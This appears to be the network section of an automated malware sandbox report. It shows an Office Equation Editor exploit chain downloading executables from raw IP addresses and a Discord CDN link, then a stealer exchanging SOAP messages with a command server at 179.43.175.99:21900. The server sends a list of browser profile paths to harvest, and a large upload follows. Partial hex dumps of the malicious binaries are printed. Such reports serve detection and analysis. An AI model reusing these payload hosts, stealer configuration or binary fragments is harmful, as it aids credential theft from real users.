Feb 22, 2022 15:30:32.077256918 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077327013 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077327967 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077346087 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077398062 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077429056 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077555895 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077625036 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077625036 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077644110 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077699900 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077717066 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077833891 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077896118 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077913046 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078008890 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078071117 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078082085 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078099966 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078150034 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078166962 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078284979 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078357935 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078371048 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078388929 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078440905 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078455925 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078524113 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078577995 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078589916 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078605890 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078656912 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078694105 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078831911 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078896999 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078911066 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.079989910 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.080538034 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.091418982 CET 443 49166 162.159.130.233 192.168.2.22




Feb 22, 2022 15:30:31.089102983 CET 52167 53 192.168.2.22 8.8.8.8

Feb 22, 2022 15:30:31.109594107 CET 53 52167 8.8.8.8 192.168.2.22

Feb 22, 2022 15:30:32.150242090 CET 50591 53 192.168.2.22 8.8.8.8

Feb 22, 2022 15:30:32.183111906 CET 53 50591 8.8.8.8 192.168.2.22

Feb 22, 2022 15:30:47.212419987 CET 57805 53 192.168.2.22 8.8.8.8

Feb 22, 2022 15:30:47.265172005 CET 59030 53 192.168.2.22 8.8.8.8

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Feb 22, 2022 15:30:31.089102983 CET 192.168.2.22 8.8.8.8 0x1af8 Standard query (0)

cdn.discordapp.com

A (IP address) IN (0x0001)

Feb 22, 2022 15:30:32.150242090 CET 192.168.2.22 8.8.8.8 0x3b9 Standard query (0)

olypath.com A (IP address) IN (0x0001)

Feb 22, 2022 15:30:47.212419987 CET 192.168.2.22 8.8.8.8 0x6392 Standard query (0)

api.ip.sb A (IP address) IN (0x0001)

Feb 22, 2022 15:30:47.265172005 CET 192.168.2.22 8.8.8.8 0xaa45 Standard query (0)

api.ip.sb A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Feb 22, 2022 15:30:31.109594107 CET

8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com

162.159.130.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET


162.159.133.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET


162.159.135.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET


162.159.134.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET


162.159.129.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:32.183111906 CET

8.8.8.8 192.168.2.22 0x3b9 No error (0) olypath.com 178.18.193.160 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:47.235760927 CET

8.8.8.8 192.168.2.22 0x6392 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net

CNAME (Canonical name)

IN (0x0001)

Feb 22, 2022 15:30:47.282295942 CET

8.8.8.8 192.168.2.22 0xaa45 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net

CNAME (Canonical name)

IN (0x0001)

cdn.discordapp.com

103.171.0.134

olypath.com

179.43.175.99:21900

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe

TimestampkBytestransferred

Direction Data

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets



1 192.168.2.22 49165 103.171.0.134 80 C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE


Direction Data

Feb 22, 2022 15:30:27.613562107 CET

0 OUT GET /_spaceX2__/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.0.134Connection: Keep-Alive

Feb 22, 2022 15:30:27.935863018 CET

1 IN HTTP/1.1 200 OKDate: Tue, 22 Feb 2022 14:30:25 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 22 Feb 2022 07:24:47 GMTETag: "3800-5d8963e65e9ce"Accept-Ranges: bytesContent-Length: 14336Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 8f 14 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 2e 00 00 00 08 00 00 00 00 00 00 de 4d 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 4d 00 00 53 00 00 00 00 60 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 50 4c 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 2d 00 00 00 20 00 00 00 2e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 00 00 00 06 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 4d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 31 00 00 78 1a 00 00 03 00 00 00 39 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 11 02 00 00 01 00 00 11 28 0b 00 00 0a 16 8d 13 00 00 01 6f 0c 00 00 0a 14 fe 06 0d 00 00 0a 73 0e 00 00 0a 28 01 00 00 2b 28 02 00 00 2b 0a 28 0b 00 00 0a 0b 38 bf 01 00 00 07 16 8d 13 00 00 01 6f 0c 00 00 0a 28 03 00 00 2b 0c 08 16 9a 25 13 08 39 9c 01 00 00 11 08 72 01 00 00 70 28 11 00 00 0a 2d 40 11 08 72 13 00 00 70 28 11 00 00 0a 2d 61 11 08 72 1b 00 00 70 28 11 00 00 0a 2d 6a 11 08 72 23 00 00 70 28 11 00 00 0a 2d 73 11 08 72 2f 00 00 70 28 11 00 00 0a 3a dd 00 00 00 38 4e 01 00 00 08 17 9a 28 0d 00 00 0a 0d 09 16 32 13 09 06 8e 69 2f 0d 09 06 28 06 00 00 06 0a 38 2e 01 00 00 72 39 00 00 70 28 12 00 00 0a 38 1f 01 00 00 08 17 9a 13 04 11 04 06 28 05 00 00 06 28 12 00 00 0a 38 08 01 00 00 08 17 9a 13 04 11 04 06 28 04 00 00 06 28 12 00 00 0a 38 f1 00 00 00 08 18 9a 13 04 08 17 9a 28 0d 00 00 0a 13 05 11 05 06 8e 69 30 59 73 13 00 00 0a 13 06 11 06 72 55 00 00 70 6f 14 00 00 0a 26 11 06 72 59 00 00 70 11 04 11 05 06 28 03 00 00 06 28 04 00 00 2b 6f 14 00 00 0a 26 11 06 72 5f 00 00 70 6f 14 00 00 0a 26 11 06 6f 16 00 00 0a 16 8d 13 00 00 01 6f 17 00 00 0a 28 12 00 00 0a 38 82 00 00 00 72 63 00 00 70 28 12 00 00 0a 2b 76 08 18 9a 13 04 08 17 9a 28 0d 00 00 0a 13 05 11 05 06 8e 69 30 56 73 13 00 00 0a 13 07 11 07 72 55 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb.M `@ @MS`PL H.text- . `.rsrc`0@@.reloc6@BMH1x90(os(+(+(8o(+%9rp(-@rp(-arp(-jr#p(-sr/p(:8N(2i/(8.r9p(8((8((8(i0YsrUpo&rYp((+o&r_po&oo(8rcp(+v(i0VsrU




Direction Data

Feb 22, 2022 15:30:32.230215073 CET

219 OUT GET /RLBIl.exe HTTP/1.1Host: olypath.comConnection: Keep-Alive

Feb 22, 2022 15:30:32.279639006 CET

220 IN HTTP/1.1 200 OKConnection: Keep-AliveContent-Type: application/x-msdownloadLast-Modified: Tue, 22 Feb 2022 11:23:44 GMTAccept-Ranges: bytesContent-Length: 97792Date: Tue, 22 Feb 2022 14:30:32 GMTServer: LiteSpeed




Direction Data


Feb 22, 2022 15:30:41.645224094 CET

322 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 179.43.175.99:21900Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Feb 22, 2022 15:30:41.693612099 CET

322 IN HTTP/1.1 100 Continue

Feb 22, 2022 15:30:41.725904942 CET

322 IN HTTP/1.1 200 OKContent-Length: 212Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:30:41 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>

Feb 22, 2022 15:30:46.752407074 CET

323 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 179.43.175.99:21900Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate

Feb 22, 2022 15:30:46.773400068 CET


Feb 22, 2022 15:30:46.841787100 CET

324 IN HTTP/1.1 200 OKContent-Length: 4744Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:30:46 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


Direction Data





Direction Data

Feb 22, 2022 15:31:01.824354887 CET

335 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 179.43.175.99:21900Content-Length: 152164Expect: 100-continueAccept-Encoding: gzip, deflate

Feb 22, 2022 15:31:01.847295046 CET


Feb 22, 2022 15:31:02.210525036 CET

486 IN HTTP/1.1 200 OKContent-Length: 147Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:31:02 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Feb 22, 2022 15:31:02.212336063 CET

486 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 179.43.175.99:21900Content-Length: 152156Expect: 100-continueAccept-Encoding: gzip, deflate

Feb 22, 2022 15:31:02.232909918 CET


Feb 22, 2022 15:31:02.304461002 CET

637 IN HTTP/1.1 200 OKContent-Length: 261Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:31:02 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Session ID Source IP Source Port Destination IPDestinationPort

Process



Direction Data

2022-02-22 14:30:32 UTC 0 OUT GET /attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

HTTPS Proxied Packets


2022-02-22 14:30:32 UTC 0 IN HTTP/1.1 200 OKDate: Tue, 22 Feb 2022 14:30:32 GMTContent-Type: application/octet-streamContent-Length: 190464Connection: closeCF-Ray: 6e18e9b23d876919-FRAAccept-Ranges: bytesAge: 49351Cache-Control: public, max-age=31536000Content-Disposition: attachment;%20filename=httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htmeETag: "e04ef1d0eae2971046e9cf8048fdf708"Expires: Wed, 22 Feb 2023 14:30:32 GMTLast-Modified: Mon, 21 Feb 2022 16:54:36 GMTVary: Accept-EncodingCF-Cache-Status: HITAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"x-goog-generation: 1645462476625965x-goog-hash: crc32c=SNuxog==x-goog-hash: md5=4E7x0OrilxBG6c+ASP33CA==x-goog-metageneration: 1x-goog-storage-class: STANDARDx-goog-stored-content-encoding: identityx-goog-stored-content-length: 190464X-GUploader-UploadID: ADPycdvVV7eWCzW3kX5n78ji9Yv3dpUPb1irIctXNyCwHGIC8y-2OJTqv6I66Oi16Ll6sIBUKRbxB6a1LgoiRchMOxcX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp

2022-02-22 14:30:32 UTC 1 IN Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 7a 58 36 4a 68 4e 73 64 34 25 32 46 54 79 69 76 42 6b 72 65 56 62 5a 58 30 51 25 32 42 32 73 78 72 33 35 6a 65 6a 76 31 33 72 76 6a 68 66 6d 6a 7a 73 7a 7a 6a 25 32 46 70 79 70 79 53 50 44 4e 42 41 63 58 35 6f 61 49 73 49 7a 64 38 78 38 6c 6c 25 32 42 38 34 62 48 57 66 34 5a 39 59 50 6b 67 54 47 78 6a 37 70 66 35 6c 43 25 32 46 30 57 34 54 39 70 6a 76 39 59 45 7a 36 68 36 44 69 78 62 77 53 38 62 70 34 47 36 36 59 4c 6d 57 7a 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zX6JhNsd4%2FTyivBkreVbZX0Q%2B2sxr35jejv13rvjhfmjzszzj%2FpypySPDNBAcX5oaIsIzd8x8ll%2B84bHWf4Z9YPkgTGxj7pf5lC%2F0W4T9pjv9YEz6h6DixbwS8bp4G66YLmWzw%3D%3D"}],"group":"cf-nel","max_a

2022-02-22 14:30:32 UTC 1 IN Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 85 03 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b6 02 00 00 30 00 00 00 00 00 00 ae d4 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2b!0 @ @`

